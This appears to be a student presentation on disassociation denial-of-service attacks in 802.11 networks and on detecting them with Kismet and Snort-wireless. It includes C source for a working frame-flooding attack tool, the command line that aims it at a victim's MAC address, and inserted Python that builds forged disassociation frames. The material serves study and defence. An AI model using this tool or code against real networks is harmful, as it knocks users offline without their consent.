Attack and Detection:
Denial of Service in Wireless Networks
by Injecting Disassociation Frames
through the Data Link Layer
Yufei Xu, Xin Wu, Da Teng
Outline
- Introduction
- Background
- Simulation Design
- Setting Up the Environment
- Experimental Results & Analysis
- Conclusion
Introduction
- 802.11:
  - a set of standards for wireless local area network (WLAN) computer communication.
  - covers the lowest two layers of the OSI model: the data link layer and the physical layer.
  - subject to many attacks: man-in-the-middle, DoS, attacks on WEP.
- Disassociation attack: one kind of DoS attack.
Background
- Architecture of a wireless network
  - Stations (STAs): all components that can connect to the wireless medium in a network. Every station is equipped with a wireless network interface card.
  - Access points (APs): base stations of the wireless network; they transmit and receive radio frequencies for wireless-enabled devices to communicate with.
Background (cont)
- Architecture of a wireless network
  - Basic service set (BSS): a set of stations that can all communicate with each other.
  - Extended service set (ESS): a set of connected BSSs.
  - Distribution system (DS): connects the APs of an extended service set.
  - Ad-hoc network: contains no access points; stations talk to each other directly.
Background (cont)
Figure 1. Infrastructure network: two BSSs, each an AP with its stations (STA), joined through a distribution system (DS) into one extended service set (ESS).
Figure 2. Ad-hoc network: a laptop and a PC communicating directly, with no AP.
Background (cont)
- 802.11 in the OSI model
  - OSI model: defines a framework for implementing networking protocols in 7 layers, from top to bottom: application, presentation, session, transport, network, data link and physical (over the physical link).
Background (cont)
- 802.11 in the OSI model
  - The 802.11 standards only concern the data link layer and the physical layer.
  - The data link layer in 802.11 is subdivided into two sublayers:
    - Medium Access Control (MAC): the rules that define how to access the wireless medium and send data; 802.11 framing, MAC addressing and the FCS error check live in this sublayer.
    - Logical Link Control (LLC, IEEE 802.2): sits above the MAC and gives upper-layer protocols a uniform interface, including flow and error control.
Background (cont)
- Wireless frames: 3 kinds of frames
  - data frames
  - management frames
  - control frames
- Generic MAC frame format (field sizes in bytes; management frames use only the first three addresses):

  | Frame control | Duration/ID | Addr 1 | Addr 2 | Addr 3 | Seq. control | Addr 4 | Frame body | FCS |
  |       2       |      2      |   6    |   6    |   6    |      2       |   6    |  variable  |  4  |
Background (cont)
- Denial of Service (DoS): an action or series of actions that prevents any part of a system from working as intended.
- DoS attack: makes a computer resource unavailable to its intended users. Two families:
  - resource allocation attacks
  - resource destruction attacks
Background (cont)
- Disassociation attack
- How does a station connect to a network?
  - The AP mediates all wireless traffic in the network.
  - A station must associate with an AP to join the network. Only then can it send data to and receive data from the network.
- Detailed steps:
  - The AP broadcasts its SSID over the air in beacon frames.
  - A station becomes aware of the wireless network by receiving wireless frames containing that information.
  - Once it has the SSID of an AP, it must complete the 802.11 authentication process with that AP before any upper-layer authentication such as 802.1X.
Background (cont.)
  - The station presents its identity to the AP.
  - The AP may accept or reject the station according to the network configuration, for example whether the station is on the AP's black list.
  - The 802.11 standards define 2 link-level types of authentication: open system and shared key.
  - Neither is mutual: only the AP authenticates stations, not vice versa.
  - Data in this process is not encrypted.
  - The station then associates (registers) with the AP to get full access to the network:
    - It sends an Association Request to the AP.
Background (cont.)
    - The AP grants the association and responds with a status code for success and an Association ID. Otherwise a failure response is sent and the procedure ends.
    - The AP now forwards frames to and from the station: from this point on the station can communicate with other devices.
  - Association is logically similar to plugging into a wired network.
  - A station can be associated with only 1 AP at a time, but it may re-associate with another one when connection problems occur or when it roams within the wireless network.
Background (cont.)
- The state diagram of authentication and association (three states):
  - State 1: Unauthenticated, Unassociated
      --authentication OK--> State 2
  - State 2: Authenticated, Unassociated
      --association or reassociation OK--> State 3
      --deauthentication--> State 1
  - State 3: Authenticated, Associated
      --disassociation--> State 2
      --deauthentication--> State 1
- What is a disassociation attack?
  - The attacker generates a forged disassociation frame and sends it to the victim.
  - The AP's MAC is used as the source address and the victim's MAC as the destination.
  - The attacker keeps sending, so the victim is pushed back to State 2 each time and stays unreachable for other devices.
  - It is a kind of DoS attack.
  - It works because 802.11 management frames carry no authentication: any station that can transmit on the channel can forge one. (The later 802.11w amendment, protected management frames, was introduced to close this gap.)
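The state diagram above, as an added example that is not part of the presentation: the three station states and their transitions encoded directly, plus a tick-based simulation of a victim that automatically reassociates after a forged disassociation. The reconnect delay, tick size and the idea of measuring availability as the fraction of ticks spent in State 3 are assumptions made for this example; the frame rates are the three used in the slides.

```python
# Added example (not from the presentation): the 802.11 station state machine
# from the slide, plus a simulation of how a victim that reassociates
# automatically loses availability as forged disassociation frames arrive
# more often. reconnect_delay_ms and tick_ms are assumed parameters.

UNAUTH_UNASSOC, AUTH_UNASSOC, AUTH_ASSOC = 1, 2, 3   # States 1, 2, 3 of the diagram

# (current state, management event) -> next state; any other pair is ignored
TRANSITIONS = {
    (UNAUTH_UNASSOC, "authentication_ok"): AUTH_UNASSOC,
    (AUTH_UNASSOC,   "association_ok"):    AUTH_ASSOC,
    (AUTH_UNASSOC,   "reassociation_ok"):  AUTH_ASSOC,
    (AUTH_UNASSOC,   "deauthentication"):  UNAUTH_UNASSOC,
    (AUTH_ASSOC,     "disassociation"):    AUTH_UNASSOC,   # what the forged frame triggers
    (AUTH_ASSOC,     "deauthentication"):  UNAUTH_UNASSOC,
}


class Station:
    def __init__(self):
        self.state = UNAUTH_UNASSOC

    def handle(self, event):
        """Apply one management event; returns the resulting state."""
        self.state = TRANSITIONS.get((self.state, event), self.state)
        return self.state

    def can_send_data(self):
        # Data (class 3) frames are only forwarded by the AP in State 3.
        return self.state == AUTH_ASSOC


def join(sta):
    """Open-system authentication followed by association: State 1 -> 2 -> 3."""
    sta.handle("authentication_ok")
    sta.handle("association_ok")
    return sta.state


def availability(frame_interval_ms, reconnect_delay_ms, duration_ms, tick_ms=100):
    """Fraction of ticks in which the victim can send data while a forged
    disassociation lands every frame_interval_ms and the victim needs
    reconnect_delay_ms to reassociate. Only reassociation is needed, not
    re-authentication, because disassociation returns it to State 2."""
    sta = Station()
    join(sta)
    reassoc_at = None
    delivered = total = 0
    for t in range(0, duration_ms, tick_ms):
        if t % frame_interval_ms == 0:            # forged frame "from the AP"
            sta.handle("disassociation")
            reassoc_at = t + reconnect_delay_ms
        if sta.state == AUTH_UNASSOC and reassoc_at is not None and t >= reassoc_at:
            sta.handle("reassociation_ok")        # client's automatic reconnect
        total += 1
        if sta.can_send_data():
            delivered += 1
    return delivered / total


if __name__ == "__main__":
    for interval in (200, 1000, 10000):           # 5/s, 1/s, 1 per 10 s as in the slides
        print(f"{interval:>6} ms between frames -> availability "
              f"{availability(interval, 500, 60000):.2f}")
```

With an assumed 500 ms reconnect delay the victim never regains State 3 at 5 frames/second, is reachable half the time at 1 frame/second, and 95% of the time at 1 frame per 10 seconds, which is the rate dependence the experiments below report.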
Simulation design
- To demonstrate the effect of a disassociation attack, we designed our simulations as follows.
- Architecture (figure: L1 tester, L2 victim and L3 detector inside the network; L4 attacker outside it):
  - L2: plays the victim, which receives disassociation frames from the attacker.
  - L1: serves as a normal machine that sends ping messages to get ICMP echo replies from the victim L2.
  - L3: works as an IDS that monitors all traffic over the entire network.
  - L4: sits outside the network and periodically sends disassociation frames to the intended victim L2.
Simulation design (cont.)
- Designed working flow
  1. Let the attacker (L4) keep sending forged disassociation frames to the victim (L2).
  2. Evaluate the victim's availability from the tester (L1), which uses the victim's echo service: it sends ICMP echo requests and waits for echo replies.
  3. Meanwhile, the IDS (L3) should detect the attack, raise an alert, and log the frames it captures to dump files.
  4. Change the rate at which the attacker sends disassociation frames to observe how severely the victim is affected.
  5. Analyze the dump files to evaluate how efficiently the IDS detects the attack at different attack frequencies.
Setting up environment
- Hardware and software configuration

  Role          | Host                          | OS                           | Wireless NIC                                   | Driver                           | Application
  AP            | D-Link DI-524 802.11g router  | -                            | -                                              | -                                | -
  Tester (L1)   | IBM ThinkPad T61              | Windows Vista Home           | Intel Wireless WiFi Link 4965AGN (802.11a/g/n) | supported by Vista               | -
  Victim (L2)   | Asus M3NP laptop              | Windows Server 2003 Standard | Netgear WG511 802.11b (Prism54 chipset)        | Netgear WG511 Wireless Assistant | -
  IDS (L3)      | IBM ThinkPad R50              | Red Hat 9 (kernel 2.4.20-8)  | SMC 2532W-B 802.11b (Prism 2.5 chipset)        | HostAP 0.0.4                     | 1) Kismet 2006-04-R1; 2) Snort-Wireless 2.4.3-alpha04
  Attacker (L4) | Toshiba Satellite M30 laptop  | Red Hat 9 (kernel 2.4.20-8)  | SMC 2532W-B 802.11b (Prism 2.5 chipset)        | HostAP 0.0.4                     | 1) libwlan (API); 2) a program based on it (our attack tool)

- Why choose a Prism-based wireless network card?
  - The SMC card is based on the Intersil Prism 2.5 chipset, which allows raw frame injection at the data link layer when driven by the HostAP driver.
  - It can also be put into monitor (promiscuous) mode to capture all traffic over the entire network.
Setting up environment (cont.)
- Software installations
- Constructing the attacker (L4):
  1. Install Red Hat 9 with kernel 2.4.20-8 from the installation CD.
  2. Copy the configuration file /usr/src/linux-2.4.20-8/configs/kernel-2.4.20-i386.config to /usr/src/linux-2.4.20-8/.config.
  3. Download hostap-0.0.4.tar.gz and unpack it.
  4. Edit its Makefile and hostap_cs.c, changing some values to match this computer.
  5. Build and install HostAP with make pccard followed by make install_pccard.
  6. Download libwlan-0.1.tar.gz and install it.
  7. Write a program based on libwlan and compile it. This program is the attack tool.
- Constructing the detector (L3):
  1. Install the OS and drivers as for the attacker (L4).
  2. Install Kismet 2006-04-R1 as the IDS and configure it.
  (Please refer to the report for installation details.)
Experimental Results And Analysis
- Procedures for conducting experiments:
  1. Start Kismet first on the detector (L3) by typing the following commands:
       cd /root
       ifconfig wlan0 promisc
       kismet
  2. The tester (L1) starts testing by pinging the victim (L2) and another machine:
       ping 192.168.1.103 -t    ---- victim's IP
       ping 192.168.1.1 -t      ---- third party's IP
  3. The attacker (L4) starts attacking by running our program (for details, see the source code in Appendix 1):
       ./deassoci wlan0ap 00:11:95:75:23:9a 00:09:5b:83:f8:9c 00:11:95:75:23:9a
     where the first MAC is the BSSID of the network, the second MAC is the victim's MAC, and the third MAC is the spoofed source MAC used by the attacker (the attacker pretends to be the real AP when sending disassociation frames to the victim).
Experimental Results And Analysis (Cont.)
- Procedures for conducting experiments (cont.):
  4. Check what happens on the tester (L1).
  5. When the attack program finishes, stop Kismet.
  6. Use snort-wireless to interpret the dump file created by Kismet:
       snort -X -w -c disassociation.rule -r Kismet-01-nov-2007-1.dump
       snort -X -w -r /var/log/snort/snort-99833875.dump > /root/dissassoc_rate_02.log
  7. Repeat the above process at different rates of sending disassociation frames.
Experimental Results And Analysis (Cont.)
- Before the attack, on the tester's side we observe (screenshots):
  The tester, at IP 192.168.1.101, can successfully ping both the third party (above) and the victim (below).
Experimental Results And Analysis (Cont.)
- When we send the disassociation frames at 5 frames/second, on the tester's side we observe (screenshots):
  The tester, at IP 192.168.1.101, is still able to ping the third party (above). However, it can no longer ping the victim at 192.168.1.103 (below).
Experimental Results And Analysis (Cont.)
- Furthermore, when we send the disassociation frames at 1 frame/second and 1 frame/10 seconds respectively, they have no effect on the tester pinging the third party, but do affect pinging the victim.
  (Screenshots: the first at 1 frame/second, the second at 1 frame/10 seconds.)
Experimental Results And Analysis (Cont.)
- Kismet, as the IDS, shows the following at 5 frames/second (screenshot):
  - It explicitly alerts on a "de-authentication/disassociation" flood on 00:00:00:00:00:00.
  - The MAC 00:00:00:00:00:00 here is the network BSSID as Kismet read it from the frames.
Experimental Results And Analysis (Cont.)
- When the disassociation frames are sent at 1 frame/second, Kismet displays (screenshot):
  - In this situation Kismet reports a suspicious disassociation frame from MAC 00:11:95:75:23:9A.
  - MAC 00:11:95:75:23:9A is the source address of the disassociation frames (the spoofed AP address).
Experimental Results And Analysis (Cont.)
- Why does Kismet generate different reports for these two situations?
  - The reason is again the rate at which the disassociation frames are sent.
  - At a high rate, say 5 frames/second, Kismet recognizes a clearly abnormal situation and reports a disassociation flood on network 00:00:00:00:00:00.
  - At a relatively lower rate, for instance 1 frame/second in our case (still high compared with normal operation), Kismet instead raises an alert questioning individual disassociation frames from a particular source (MAC 00:11:95:75:23:9A).
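The two behaviours just described (a flood alert at a high rate, a per-frame "suspicious" alert at a low one), as an added example that is neither the presentation's code nor Kismet's own algorithm: a sliding-window rate detector fed with the timestamp, source, destination and BSSID of each disassociation or deauthentication frame. The window length, the flood threshold and the replayed attack log are constructed for this example; the MAC addresses and the snort-wireless timestamp format are the ones shown in the slides.

```python
# Added example (not the presentation's code and not Kismet's logic): a
# minimal rate-based detector for disassociation/deauthentication frames.
# WINDOW_S and FLOOD_THRESHOLD are assumed values chosen so that 5 frames/s
# is a flood and 1 frame/s is not; the replayed log is constructed.
from collections import deque
from datetime import datetime, timedelta

WINDOW_S = 2.0          # assumed sliding window length in seconds
FLOOD_THRESHOLD = 5     # assumed: this many frames inside the window is a flood

AP_MAC = "00:11:95:75:23:9a"        # real AP, also the spoofed source in the slides
VICTIM_MAC = "00:09:5b:83:f8:9c"
FORGED_BSSID = "00:00:00:00:00:00"  # what the attack tool put in the BSSID field


def parse_snort_time(stamp, year=2007):
    """Parse the MM/DD-HH:MM:SS.ffffff timestamps printed by snort-wireless."""
    return datetime.strptime(f"{year}/{stamp}", "%Y/%m/%d-%H:%M:%S.%f")


class DisassocRateDetector:
    def __init__(self, ap_mac, window_s=WINDOW_S, flood_threshold=FLOOD_THRESHOLD):
        self.ap_mac = ap_mac.lower()
        self.window = timedelta(seconds=window_s)
        self.flood_threshold = flood_threshold
        self.recent = deque()         # timestamps of recent disassoc/deauth frames
        self.flood_reported = False   # one flood alert until the rate drops again

    def observe(self, ts, src, dst, bssid):
        """Feed one disassoc/deauth frame (timestamps non-decreasing); returns alerts."""
        self.recent.append(ts)
        while ts - self.recent[0] > self.window:      # drop frames outside the window
            self.recent.popleft()
        if len(self.recent) >= self.flood_threshold:
            if self.flood_reported:
                return []
            self.flood_reported = True
            return [f"FLOOD: {len(self.recent)} disassoc/deauth frames within "
                    f"{self.window.total_seconds():g}s on BSSID {bssid}"]
        self.flood_reported = False
        # Below the flood rate, judge the single frame: a genuine disassociation
        # from the AP carries the AP's MAC as both source and BSSID.
        problems = []
        if src.lower() != self.ap_mac:
            problems.append(f"source {src} is not the AP {self.ap_mac}")
        if bssid.lower() != self.ap_mac:
            problems.append(f"BSSID field {bssid} does not match the AP")
        if problems:
            return [f"SUSPICIOUS: disassoc to {dst}: " + "; ".join(problems)]
        return []


def replay(rate_hz, n_frames, start=None):
    """Run the detector over n_frames forged frames at rate_hz; returns alert counts by kind."""
    start = start or parse_snort_time("11/01-21:06:36.936921")   # first Appendix 4 timestamp
    det = DisassocRateDetector(AP_MAC)
    counts = {}
    for i in range(n_frames):
        ts = start + timedelta(seconds=i / rate_hz)
        for alert in det.observe(ts, AP_MAC, VICTIM_MAC, FORGED_BSSID):
            kind = alert.split(":")[0]
            counts[kind] = counts.get(kind, 0) + 1
    return counts


if __name__ == "__main__":
    for rate in (5.0, 1.0, 0.1):   # the three rates used in the experiments
        print(f"{rate:g} frames/s -> {replay(rate, 50)}")
```

At 5 frames/second the first four frames are flagged individually and the fifth turns the alert into a single flood report; at 1 frame/second and 1 frame per 10 seconds the window never fills, so every frame is reported on its own because its BSSID field does not match the AP. Note that the source-address check alone would not fire here, since the attacker spoofs the AP's MAC exactly as the slides describe.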
Experimental Results And Analysis (Cont.)
- Why does Kismet report a disassociation flood on the network with BSSID 00:00:00:00:00:00 when we send disassociation frames at 5 frames/second?
- This can be answered from the actual disassociation frames we sent over the network:
    0x0000: A0 08 02 01 00 09 5B 83 F8 9C 00 11 95 75 23 9A
    0x0010: 00 00 00 00 00 00 F0 6B 05 00
  - The first two bytes "A0 08" are the frame control field: type 0 (management), subtype 10 (disassociation), with the retry flag set in the second byte.
  - The next two bytes "02 01" are the duration/ID field (little-endian, 0x0102 microseconds), used to update the NAV.
  - The following six bytes "00 09 5B 83 F8 9C" are the destination MAC, which is the victim's MAC.
  - The next six bytes "00 11 95 75 23 9A" are the source MAC from which this frame claims to be sent (the spoofed AP address).
Experimental Results And Analysis (Cont.)
  - The following six bytes "00 00 00 00 00 00" are the BSSID field.
  - The next two bytes "F0 6B" are the sequence control field (little-endian 0x6BF0: fragment number 0, sequence number 1727).
  - The last two bytes "05 00" are the reason code (little-endian 5, "AP unable to handle all currently associated stations", i.e. WLAN_REASON_DISASSOC_AP_BUSY in the attack program).
- Given this frame layout, it is consistent that when Kismet reports a disassociation flood on a network it names the BSSID field, 00:00:00:00:00:00.
- Note that a genuine disassociation from the AP would carry the AP's own MAC both as the source and in the BSSID field. The all-zero BSSID is a property of the frames our tool produced (the real BSSID was passed on the command line but does not appear in the frame) and is itself an anomaly a detector can key on.
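The byte-by-byte walk-through above, and the generic frame layout from the Background slides, as an added example that is not the presentation's code and not libwlan's build_disassoc: a builder and a parser for disassociation/deauthentication frames, applied to the captured bytes from the slide, plus a check for the forgery indicators just discussed. The two captured frames are copied from Appendix 3; the function names, the reason-code table subset and the indicator strings are constructed for this example.

```python
# Added example (not the presentation's code, not libwlan): build and decode
# 802.11 disassociation/deauthentication frames. CAPTURED_FRAME and
# CAPTURED_FRAME_NEXT are the first and third entries of Appendix 3 (FCS not
# included, as in the dump); everything else here is constructed.
import struct

TYPE_MANAGEMENT = 0
SUBTYPE_DISASSOC = 0x0A
SUBTYPE_DEAUTH = 0x0C
FLAG_RETRY = 0x08        # bit 3 of the second frame-control byte
MAC_HDR_LEN = 24         # frame control + duration + 3 addresses + sequence control

# Subset of the IEEE 802.11 reason codes
REASON_CODES = {
    1: "unspecified",
    2: "previous authentication no longer valid",
    3: "deauthenticated because station is leaving",
    4: "disassociated due to inactivity",
    5: "AP unable to handle all currently associated stations",  # WLAN_REASON_DISASSOC_AP_BUSY
    8: "disassociated because station is leaving",
}

CAPTURED_FRAME = bytes.fromhex(
    "A0 08 02 01 00 09 5B 83 F8 9C 00 11 95 75 23 9A "
    "00 00 00 00 00 00 F0 6B 05 00"
)
CAPTURED_FRAME_NEXT = bytes.fromhex(
    "A0 00 02 01 00 09 5B 83 F8 9C 00 11 95 75 23 9A "
    "00 00 00 00 00 00 00 6C 05 00"
)


def mac_to_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def mac_to_bytes(text):
    return bytes(int(octet, 16) for octet in text.split(":"))


def build_disassoc(dst, src, bssid, reason, sequence=0, duration=0, retry=False, deauth=False):
    """Build a disassociation (or deauthentication) frame without FCS; fields are little-endian."""
    subtype = SUBTYPE_DEAUTH if deauth else SUBTYPE_DISASSOC
    fc0 = (TYPE_MANAGEMENT << 2) | (subtype << 4)      # protocol version 0
    fc1 = FLAG_RETRY if retry else 0
    header = (struct.pack("<BBH", fc0, fc1, duration)
              + mac_to_bytes(dst) + mac_to_bytes(src) + mac_to_bytes(bssid)
              + struct.pack("<H", (sequence << 4) & 0xFFFF))   # fragment number 0
    return header + struct.pack("<H", reason)             # 2-byte reason code body


def parse_mgmt_frame(frame):
    """Decode the MAC header of a management frame; adds the reason code for disassoc/deauth."""
    if len(frame) < MAC_HDR_LEN:
        raise ValueError("frame shorter than an 802.11 MAC header")
    fc0, fc1, duration, seq_ctrl = struct.unpack("<BBH18xH", frame[:MAC_HDR_LEN])
    info = {
        "version": fc0 & 0x03,
        "type": (fc0 >> 2) & 0x03,
        "subtype": fc0 >> 4,
        "retry": bool(fc1 & FLAG_RETRY),
        "duration": duration,
        "addr1_dst": mac_to_str(frame[4:10]),
        "addr2_src": mac_to_str(frame[10:16]),
        "addr3_bssid": mac_to_str(frame[16:22]),
        "fragment": seq_ctrl & 0x0F,
        "sequence": seq_ctrl >> 4,
    }
    if info["type"] == TYPE_MANAGEMENT and info["subtype"] in (SUBTYPE_DISASSOC, SUBTYPE_DEAUTH):
        reason, = struct.unpack_from("<H", frame, MAC_HDR_LEN)
        info["reason"] = reason
        info["reason_text"] = REASON_CODES.get(reason, "reserved/unknown")
    return info


def forgery_indicators(info, ap_mac):
    """Reasons why a frame claiming to come from ap_mac does not look like a genuine AP disassociation."""
    ap_mac = ap_mac.lower()
    found = []
    if info["addr3_bssid"] == "00:00:00:00:00:00":
        found.append("BSSID field is all zeros")
    if info["addr2_src"] != info["addr3_bssid"]:
        found.append("source address differs from BSSID (an AP sends both as its own MAC)")
    if info["addr2_src"] != ap_mac:
        found.append("source is not the AP")
    return found


if __name__ == "__main__":
    for name, raw in (("captured", CAPTURED_FRAME), ("next", CAPTURED_FRAME_NEXT)):
        info = parse_mgmt_frame(raw)
        print(name, info, forgery_indicators(info, "00:11:95:75:23:9a"))
```

Decoding the captured bytes reproduces the slide's reading (management/disassociation, retry set, victim as destination, spoofed AP as source, zero BSSID, sequence number 1727, reason 5), and rebuilding the frame from those fields gives back exactly the captured bytes. The third Appendix 3 entry decodes to sequence number 1728 with the retry flag clear, which is why the first two entries are the same frame and its retransmission.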
Experimental Results And Analysis (Cont.)
- Finally, when we use snort-wireless to interpret the dump files created by Kismet for 1 frame/second and 5 frames/second respectively, we observe:
  - For 1 frame/second, snort-wireless reports 801 such disassociation frames captured by Kismet.
  - For 5 frames/second, snort-wireless reports 720 such frames logged by Kismet.
- From this we infer that Kismet's logging capability also depends on the rate at which the disassociation frames are sent: the faster run produced fewer logged frames. (The attack program in Appendix 1 sends 100 x 10 = 1000 frames per run, so both captures are incomplete; retransmitted frames, which appear in the dumps as duplicates with the retry flag set, also affect the count.)
Conclusions
- The experimental results indicate the following:
  - The severity of the attack on the victim increases with the rate at which the disassociation frames are sent: the higher the rate, the more severely the victim is affected.
  - Kismet can report the severity of the attack based on the rate at which it sees disassociation frames (a per-frame alert at low rates, a flood alert at high rates).
  - The capturing ability of Kismet, as an IDS, also depends on the rate at which the disassociation frames are sent: at a relatively high rate, Kismet does not capture all the disassociation frames.
Appendix 1 – source code
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <libwlan.h>

/* Attack tool: floods one station with forged disassociation frames.
   Usage: ./deassoci <wlan#ap> <bssid_address> <dst_address> <src_address>
   The sending rate is set by the delay inside the inner loop (see below). */
int main(int argc, char *argv[]) {
    int s, len, i, j;
    const char *iface = NULL;                   /* interface bound to the raw socket */
    struct ieee80211_mgmt mgmt;                 /* management frame structure defined in libwlan */
    char *bssid_addr, *dst_addr, *src_addr;     /* BSSID, destination MAC, source MAC from the command line */
    u_char *bssid, *dst_mac, *src_mac;          /* the same addresses converted to binary */

    if (argc != 5) {                            /* improper input supplied by the user */
        printf("Usage: %s <wlan#ap> <bssid_address> <dst_address> <src_address>\n", argv[0]);
        printf("Example: %s wlan0ap 00:11:95:75:23:9a 00:09:5b:83:f8:9c 00:11:95:75:23:9a\n", argv[0]);
        exit(-1);
    }
    iface = argv[1];                            /* store the interface */
    bssid_addr = argv[2];                       /* store the BSSID */
    dst_addr = argv[3];                         /* store the destination MAC */
    src_addr = argv[4];                         /* store the source MAC */

    s = socket_init(iface);                     /* construct the socket used to inject frames */
    bssid = lib_hex_aton(bssid_addr, &len);     /* convert the BSSID into binary */
    dst_mac = lib_hex_aton(dst_addr, &len);     /* convert the destination MAC into binary */
    src_mac = lib_hex_aton(src_addr, &len);     /* convert the source MAC into binary */

    for (j = 1; j <= 100; j++) {
        for (i = 1; i <= 10; i++) {
            /* construct the disassociation frame, reason code 5 (AP busy) */
            mgmt = build_disassoc(dst_mac, src_mac, bssid, WLAN_REASON_DISASSOC_AP_BUSY);
            if (send(s, &mgmt, IEEE80211_HDRLEN + sizeof(mgmt.u.disassoc), 0) < 0) {
                perror("send");
                sleep(1);
            }
            /* rate control: exactly one of these delays is active in a given run
               usleep(200000);   -> 5 frames/second
               sleep(1);         -> 1 frame/second  */
            sleep(10);           /* -> 1 frame/10 seconds */
        }
        printf("Progression status: %.1f %%\n", j / 100.0 * 100);
    }
    close(s);
    return 0;
}
Appendix 2 – Rule for Snort-wireless
alert wifi 00:11:95:75:23:9A -> 00:09:5B:83:F8:9C (msg: "Disassociation Attack"; type: TYPE_MANAGEMENT; stype: STYPE_DISASSOC;)
Appendix 3 – Disassociation Frames
11/01-22:55:23.268612 Dissassoc. 0:11:95:75:23:9A -> 0:9:5B:83:F8:9C
bssid: 0:0:0:0:0:0 Flags: Re
0x0000: A0 08 02 01 00 09 5B 83 F8 9C 00 11 95 75 23 9A  ......[......u#.
0x0010: 00 00 00 00 00 00 F0 6B 05 00                    .......k..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
11/01-22:55:23.363666 Dissassoc. 0:11:95:75:23:9A -> 0:9:5B:83:F8:9C
bssid: 0:0:0:0:0:0 Flags: Re
0x0000: A0 08 02 01 00 09 5B 83 F8 9C 00 11 95 75 23 9A  ......[......u#.
0x0010: 00 00 00 00 00 00 F0 6B 05 00                    .......k..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
11/01-22:55:23.455478 Dissassoc. 0:11:95:75:23:9A -> 0:9:5B:83:F8:9C
bssid: 0:0:0:0:0:0 Flags:
0x0000: A0 00 02 01 00 09 5B 83 F8 9C 00 11 95 75 23 9A  ......[......u#.
0x0010: 00 00 00 00 00 00 00 6C 05 00                    .......l..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
(The first two entries are the same frame and its retransmission: the retry flag is set ("Flags: Re", frame-control byte 0x08) and the sequence number 0x6BF is repeated. The third entry carries the next sequence number, 0x6C0, with the retry flag clear.)
Appendix 4 – Alerts by Snort-wireless
[**] [1:0:0] Disassociation Attack [**]
11/01-21:06:36.936921
[**] [1:0:0] Disassociation Attack [**]
11/01-21:06:38.812559
[**] [1:0:0] Disassociation Attack [**]
11/01-21:06:38.815930
[**] [1:0:0] Disassociation Attack [**]
11/01-21:06:38.880704
[**] [1:0:0] Disassociation Attack [**]
11/01-21:06:39.822643
[**] [1:0:0] Disassociation Attack [**]
11/01-21:06:39.921190
References
[1] S. Anderson, "A Linux Wireless Access Point HOWTO", chapter 4, v0.1, June 6, 2003. [Online] Available: http://oob.freeshell.org/nzwireless/hostap.html
[2] Source for the hostap-0.0.4 driver. [Online] Available: http://hostap.epitest.fi/releases/
[3] Source for libwlan-0.1. [Online] Available: http://wirelessexposed.blogspot.com/2007/03/hakcing-tools-at-your-disposal.html
[4] Source for Kismet 2006-04-R1. [Online] Available: http://www.kismetwireless.net/
[5] Source for snort-wireless-2.4.3-alpha04. [Online] Available: http://snort-wireless.org/
[6] P. Brenner, "A Technical Tutorial on the IEEE 802.11 Protocol", BreezeCOM, 1996.
[7] A. H. Scogin, "Disabling a Wireless Network via Denial of Service", Technical Report MSU-070424.
[8] http://www.intel.com/support/wireless/wlan/sb/CS-025325.htm
Question Period
Any questions?